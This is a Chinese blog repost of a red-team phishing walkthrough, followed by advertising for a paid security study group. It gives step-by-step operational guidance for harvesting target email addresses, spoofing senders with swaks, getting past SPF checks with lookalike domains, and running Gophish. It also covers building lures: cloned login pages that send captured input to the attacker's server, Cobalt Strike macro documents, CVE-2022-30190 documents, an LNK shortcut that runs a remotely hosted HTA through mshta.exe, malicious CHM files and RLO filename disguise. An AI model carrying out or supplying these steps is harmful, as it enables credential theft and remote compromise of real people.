文章总结: 本文系统复盘红队钓鱼攻击全链路,涵盖邮箱信息收集方法、SPF绕过技术、钓鱼平台搭建及多种钓鱼文件制作方式,并给出可操作建议。文章技术内容详实,但末尾含大量商业推广信息,降低整体价值。
综合评分: 62
文章分类: 红队,社会工程学,渗透测试
红队钓鱼攻击的全链路复盘
K7
K7
陌笙不太懂安全
2026年9月29日 17:01
河北
在小说阅读器读本章
去阅读
在公众号小说中沉浸阅读
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号陌笙不太懂安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉,谢谢!
原文作者:K7原创链接:https://xz.aliyun.com/news/92064
一、前言
在常规渗透无效果的情况下,邮件钓鱼在此时就显得尤为重要,且往往成果是很直接的
二、邮箱信息打点
想要进行邮件钓鱼,必然要先知道目标相关的一些内部人员的邮箱,如果能获取到内部某些具体业务的人员邮箱就更好了,就可以进行精准的钓鱼。
收集邮箱的方法:
1、邮箱获取网站
http://www.skymem.info/
只能展示部分,多了就需要收费
类似的还有:
- https://hunter.io/
- http://www.skymem.info/
- https://www.email-format.com/i/search/
等网站
2、邮箱收集工具
theHarvester(kali自带):https://github.com/laramies/theHarvester
有可能搜集不到任何结果,都是正常现象
theHarvester -d qq.com -b baidu -d指定要搜集的域名,-b指定使用的搜索引擎
类似的工具还有:https://github.com/bit4woo/teemo
3、github搜索
可以在github上面搜索企业/域名的相关信息,看有没有泄露的邮箱信息
4、攻击面管理平台
零零信安:https://0.zone/
输入企业名称,可以获取到网络上泄露的域名信息
验证邮箱是否可用
获取到的邮箱并不一定都有效,有的人员离职或者其他原因注销,要对邮箱进行验证
- 通过mailtester.com可以查询邮箱地址是否存在
https://mailtester.com/testmail.php
- verifyemail这款工具可批量验证邮箱
https://github.com/Tzeross/verifyemail
- mailtester.py
https://github.com/angusluk/MailTester
检查目标邮箱是否有 SPF 检验
SPF 全称为 Sender Policy Framework,即发件人策略框架。
电子邮件认证机制,主要作用是防止伪造邮件地址
可以通过执行命令,观察命令的返回结果来判断是否有SPF,以及SPF的具体检验规则
windows执行命令:
nslookup -qt=txt <domain>nslookup -qt=txt spf.mail.qq.com
linux执行命令:
dig -t txt <domain>
如果没有spf的信息,则证明所有的邮箱发来的信息他都会接受,没有设置SPF规则校验
对于没有防护措施的邮箱,可以使用swaks工具直接发送邮件,随意伪造发件人
在上面获取一个邮箱
通过查询发现这个邮箱没有设置spf规则检验
使用swaks工具进行伪造邮箱给他发送邮件(返回状态码为250即发送成功)
swaks --body "test" --header "Subject:testT" -t [email protected] -f [email protected]
成功接收到
三、SPF绕过
绕过spf的两种方法
1、伪造发送邮箱
伪造发送邮箱为和允许接收的合法邮箱名称相像的名字,如合法邮箱后缀:qq.com; 则可以伪造成:qq.com.cn
以163邮箱为例
防止邮件标题乱码,采用base64编码,邮件标题base格式可使用以下网址,转换,输入中文提交即可
存在spf校验
伪造一个随便写的邮箱名字去发送邮件,失败
伪造了 qq.com 去发送,失败
在 qq.com 后面加上一个cn,即 qq.com.cn (是一个不存在的域名) ,成功
2、设置邮箱转发
在163邮箱这里开启 POP3/SMTP服务
会获得一个授权码
找个一个想要伪造的邮件,下载eml文件
按需求修改一下时间、内容等信息,然后使用 swaks 工具进行发送
swaks --to 收信人 -f 发信人 --data 1.eml --server smtp.163.com -p 25-au 帐号 -ap 授权码
成功接收到发来的邮件,唯一不同就是多了个 由***代发
实际项目中可以修改邮件内容,嵌入我们的恶意链接
四、钓鱼环境搭建
1、钓鱼平台搭建
gofish钓鱼平台:https://github.com/gophish/gophish/releases
可以直接下载对应操作系统二进制文件,启动之后会在电脑上自动开启web端口让我们进行访问
可以在 config.json 文件里面修改某些配置来修改启动端的口等信息
具体安装步骤:https://docs.getgophish.com/user-guide
2、邮件服务器搭建
自己搭建一个邮件服务器用来发送邮件
EwoMail邮件服务器搭建:
http://doc.ewomail.com/docs/ewomail/install
也可以用docker直接拉取:
https://www.cnblogs.com/sakura521/p/14932701.html
3、注册相似域名
为了增强邮件钓鱼的真实性,在使用我们自己搭建的邮件服务器时需要用到我们自己注册的域名作为邮箱后缀,所以要尽可能的使用和目标域名相似的域名
可以使用下面这个工具来查询有哪些相似的域名没有被注册
urlcrazy工具:https://github.com/urbanadventurer/urlcrazy
kali下可以直接通过
apt install urlcrazy进行安装
安装urlcrazy的依赖
gem install json colorize async async-dns async-http
工具提供了很多参数,主要使用-i和-r,,可以自动去查找与目标域名相似的域名,并且提示是否可以注册
会以删除某字符、重复字符等方式生成形似域名,vaild显示为fasle,说明该域名无人使用可以注册。-r可以不解析dns提高速度
urlcrazy -i jd.com -r | more
在线版:https://suip.biz/?act=urlcrazy
该地址提供了在线版本的urlcrazy,就是广告有点多,但是在线版的查询dns的速度很快
五、钓鱼文件制作
以上内容都准备好之后,就可以向目标发送钓鱼邮件了,邮件的内容也是能否成功的一大重要因素
常见的钓鱼邮件内容有以下几种:
1、伪造html页面
在邮件正文中通过一些诱导性的话语诱导用户点击其中的链接
然后链接地址跳转到我们伪造的一个看似正常的html页面,页面功能可以是输入某账号密码、手机号、员工工号等我们需要的信息,当受害者输入之后,我们就可以获取到输入内容
一般可以在原来的html页面里面添加js代码,输入内容之后自动将内容发送给我们服务器的文件,我们在服务器上面搭建http服务编写脚本进行内容接收,接收到内容后给他跳转到真实页面,整体看着没什么异常
或者是嵌入下载链接让用户下载我们的木马,点击实现上线
克隆网站html页面的几种方式:
- 手动另存为/google插件SingleFile保存页面
- setlookit 工具(kali自带):https://github.com/trustedsec/social-engineer-toolkit
会生成一个链接地址,用户访问后输入的内容会实时进行捕获
- goblin
在运行程序的服务器上面开放http服务,模拟网页
2、office宏病毒/CVE漏洞
使用word或者excel均可制作
步骤:
新建一个word->文件->选项 ->自定义功能区 ->(勾选)开发工具
返回到word主页面,会多出一个开发工具选项,点击开发工具,点击宏、宏名随便输入,宏的位置选择当前的这个文件、然后点创建
然后将CS生成的宏代码粘贴进去,CTRL+S进行保存
点击否
保存类型选择这个启用宏的word文档
生成完毕之后就可发送给受害者,但是受害者打开的时候需要手动点击开启宏,不然无效
还可以利用之前爆出的CVE漏洞,不需要受害者去进行点击什么东西,打开就能上线
-Microsoft MSDT CVE-2022-30190 代码执行
漏洞原理:
恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,
通过ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。
感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。
此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意
文档依旧可以使用ms-msdt URI执行任意PowerShell代码。
-Microsoft MSHTML CVE-2021-40444 远程代码执
-CVE-2017-11882
3、lnk快捷方式
CS点击有效载荷、HTA文档、method里面有三个,都可以,这里我选择powershell
选择之后会生成一个HTA文件
然后使用CS的文件托管功能,将这个HTA文件托管到CS的服务器上面,并开放一个端口开启http服务以供访问
接下来在桌面创建一个快捷方式,随便指定应用程序
创建好之后对快捷方式进行修改,将目标改为:C:\Windows\System32\mshta.exe <文件托管链接>
起始位置改为:C:\Windows\System32\
可以更换个系统程序的图标进行伪装,更换成其他应用的图标发送给对方后可能会无法显示,因为对方电脑上可能没有这个图标,所以建议更换为系统某个图标
C:\Windows\System32\mshta.exe是系统程序,杀毒软件一般不会杀,但是经测试还是会进行警告
通过这个程序去远程执行我们服务器上面的hta文件,实现上线
4、CHM电子书
CS生成powershell格式代码命令,放在一个html代码里面,使用esay chm工具编译成chm文件,对方点击此chm文件即可上线
可以找一个正常的chm文件进行解压,在其中某个html页面嵌入恶意代码,进行伪装的效果
5、RLO文件伪装
exe文件后缀反转 xgpj.exe 反转为 xexe.ipg 进行伪装,RLO伪装
可以伪装成zip文件,之后点击就会进行解压,解压的过程中就会执行恶意程序
后台回复加群加入交流群
广告:cisp pte/pts &nisp1级2级低价报考
陌笙安全纷传圈子+陌笙src挖掘知识库+陌笙安全漏洞库+陌笙安全面试题库简单介绍(加入纷传圈子送知识库+漏洞库+面试题库)
如果觉得合适可以加入,圈子目前价格39.9元,价格只会根据圈子内容和圈子人数进行上调,不会下跌。。。
圈子福利
edu漏洞挖掘1v1指导出洞
skill+grok辅助挖掘某企业src实战效果,能出但是重复多,agent独立挖掘也可以,见仁见智,看个人习惯,好的模型是最重要的。
企业src边缘&核心资产实战效果&&有重复但是证明好模型+AI确实够用
(图片仅供参考,我出不等于你出,见识到ai神力即可,多去用AI!!!)
不是P图,单洞1.2w记录
陌笙src挖掘知识库介绍(内容持续更新中!!!)
信息收集(主域名信息收集,子域名信息收集等&会永久提供fofa-key助力)弱口令漏洞&未授权访问漏洞挖掘任意文件读取&删除&下载&上传漏洞sql注入漏洞url重定向漏洞csrf&ssrf漏洞挖掘XSS&XXE漏洞挖掘等等常见漏洞cors&目录遍历&越权漏洞挖掘EDUSRC(证书站挖掘案例分享&edusrc挖掘技巧分享)CNVD挖掘技巧分享&实战案例报告编写公益漏洞挖掘(公益src挖掘漏洞分享&提供补天1权重资产)SRC挖掘实战(针对各种常见功能总结的常见测试思路等快速提升)经典常见Nday漏洞(常见中间件&以及各种常见框架)复现云安全相关漏洞挖掘(云key扫盲&云存储桶&快速识别云环境&云攻防)AI相关学习(AI基础&AI代码审计实战测试&webLLM攻击等)APP&小程序漏洞挖掘等各模块不在一一介绍
信息收集
src挖掘基础
src挖掘实战
edusrc
经典nday复现
云安全&AI安全
陌笙安全漏洞库介绍
最新漏洞查看1day&0day分享EDU学校相关漏洞Web应用漏洞CMS漏洞OA产品漏洞中间件漏洞云安全漏洞人工智能漏洞其他漏洞
陌笙安全面试库
渗透测试基本问题一汇总渗透测试基本问题二汇总渗透测试基本问题三汇总微步护网面试题目长亭科技面试深信服护网面试启明星辰渗透测试面试题目安恒面试题目绿盟笔试题目360面试奇安信护网面试运维面试题目运维面试题库网安面试相关文档大全相关面试文章推荐等等
POC库&&更新适配afrog&&nuclei&&dddd的POC&1day/Nday等&&dddd二开工具[助力渗透测试&&红蓝攻防]**
工具截图
实战效果
poc库【后续持续更新】
AI赋能-skill辅助漏洞挖掘(免责&&慎用)
圈友skill+ai辅助渗透实战效果,支持打假!
证书站
普通站点
陌笙纷传圈子介绍
1、src挖掘思维导图,信息收集思维导图,edusrc挖掘思维导图,以及后续的红队&面试思维导图&自己网安笔记等持续更新2、2025-2026的edusrc实战报告包含证书站和非证书站以及2025之前的各种优质报思路分享3、各种src报告思路分享(内部&外部)4、分享各种src挖掘&edusrc挖掘培训资料&视频5、不定期分享通杀、0day6、有圈子群可以技术交流以及不定期抽取证书&免费rank7.分享各种护网资料各家安全厂商讲解视频&精选实战面试题目8、各种框架漏洞技巧分享9、各种源码分享(泛微、正方系统、用友等)10、漏洞挖掘工具&信息收集工具&内网渗透免杀等网安工具分享11、各种ctf资料以及题目分享12、cnvd挖掘技巧&CNVD资产&src资产分享&补天1权重资产分享&fofakey共用13、免杀、逆向、红队攻内网防渗透等课程分享14、漏洞库&字典以各种内容不在一一说明15、cisp-pte/pts&nisp一级&nisp二级&edusrc证书内部价格15、如果有漏洞挖掘问题或者工具资料需求可以找群主(尽量满足)
目前800多条内容,扫描下方二维码查看详情以及加入圈子,持续更新中。。
如果觉得合适可以加入,价格不定期会根据圈子内容和圈子人数进行上调。。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:陌笙不太懂安全 K7
K7《红队钓鱼攻击的全链路复盘》